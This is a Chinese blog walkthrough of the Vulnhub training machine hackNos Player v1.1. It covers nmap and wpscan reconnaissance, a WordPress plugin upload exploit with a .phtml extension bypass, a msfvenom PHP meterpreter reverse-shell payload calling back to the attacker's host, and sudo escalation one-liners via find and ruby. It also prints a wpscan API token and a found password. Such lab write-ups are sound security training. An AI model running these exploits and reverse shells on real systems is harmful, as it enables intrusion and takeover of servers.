投稿
  1. 极客之音首页
  2. 后端漫谈

Vulnhub靶机:HACKNOS_ PLAYER V1.1

飞熊 后端漫谈 阅读 108

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 Vulnhub靶机:HACKNOS_ PLAYER V1.1,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

目录

介绍

系列: hackNos(此系列共7台)
发布日期:2020年04月10日
难度:初级-中级
Flag : 1个,根用户的root.txt
学习:

  • wordpress 安全测试
  • 远程代码执行
  • 特权提升

靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/

信息收集

主机发现

arp-scan主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
在这里插入图片描述

主机信息探测

  1. 开放端口探测:nmap -p- 192.168.1.117,只开放了80和3306端口(快速确认开放端口)

在这里插入图片描述

  1. 对开放端口服务做进一步探测:nmap -p80,3306 -sV 192.168.1.117

在这里插入图片描述

  1. 使用默认的NSE脚本进行扫描:nmap -p3306 -sC 192.168.1.117

看到数据库版本是5.5.5
在这里插入图片描述

网站探测

访问80端口,没什么有价值的信息。
在这里插入图片描述

目录扫描

gobuster dir -u http://192.168.1.117/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100

在这里插入图片描述

没发现什么有价值的信息,换用之前的文章 HACLABS: NO_NAME 中的套路(换用大字典)的方式依然无效。木得办法,回过头来看看网站首页吧,能不能看到什么有价值的东西。发现了一个网站目录:“g@web”
在这里插入图片描述

由于需要加载google站点的api,打开速度略慢。耐心等待一会后看到了如下网站。通过插件得知网站是WordPress 5.3.11
在这里插入图片描述

wpscan列出站点的用户名、账号

wpscan --url http://192.168.1.117/g@web -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现了一条信息
在这里插入图片描述

打开网站,这个应该是个密码:hackNos@9012!!
在这里插入图片描述

尝试登录网站,失败
在这里插入图片描述

wpscan漏扫网站

wpscan --url http://192.168.1.117/g@web/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现远程代码执行漏洞!
在这里插入图片描述

打开根据提供的网址,看到了利用代码
在这里插入图片描述

复制下来,对url地址略作修改,得到:

<form method="post" enctype="multipart/form-data" action="http://192.168.1.117/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

将其保存为本地的一个html文件,然后用浏览器打开它,如下图,是一个文件上传
在这里插入图片描述

这就好说了,一句话木马来了😎

Getshell

由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。

  1. msf准备
生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php

开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.1.118
exploit
  1. 投递后门,失败了

在这里插入图片描述

看到提示,文件格式不支持!自己真是大意了,回过头在漏洞验证网站中得知,漏洞的成因为使用了switch case简单匹配了黑名单后缀导致可进行绕过,漏洞验证网站建议我们使用.phtml后缀绕过

  1. 修改后门后缀为.phtml,重新投递文件

在这里插入图片描述

  1. 访问后门

根据利用代码得知,上传的文件在:http://example.com/wp-content/uploads/wpsp
在这里插入图片描述

  1. 获取shell

鼠标单击文件,获取shell
在这里插入图片描述

提权

前面使用wpscan拿到了密码:**hackNos@9012!! **,依次尝试,得知是 **security **用户的
在这里插入图片描述

发现一个敏感文件,暂时没有访问权限
在这里插入图片描述

sudo提权

  1. 第一次sudo提权

提示可以通过用户hacknos进行find提权,而靶机上只有hackNos-boat、hunter、security三个用户,因此这里的用户hacknos指的应该是hackNos-boat
在这里插入图片描述

如下图,切换用户hacknos失败,切换hackNos-boat成功
通过网站 https://gtfobins.github.io/gtfobins/find/ 获知提权命令:

sudo -u hackNos-boat find . -exec /bin/bash \; -quit

在这里插入图片描述

  1. 第二次sudo提权

继续尝试sudo提权,发现ruby提权,通过网站 https://gtfobins.github.io/gtfobins/ruby/ 得知提权命令:

sudo -u hunter ruby -e 'exec "/bin/sh"'

在这里插入图片描述

  1. 第三次sudo提权

在这里插入图片描述

获取所有Flag

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134245.html

(0)
飞熊的头像飞熊bm
0 0

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!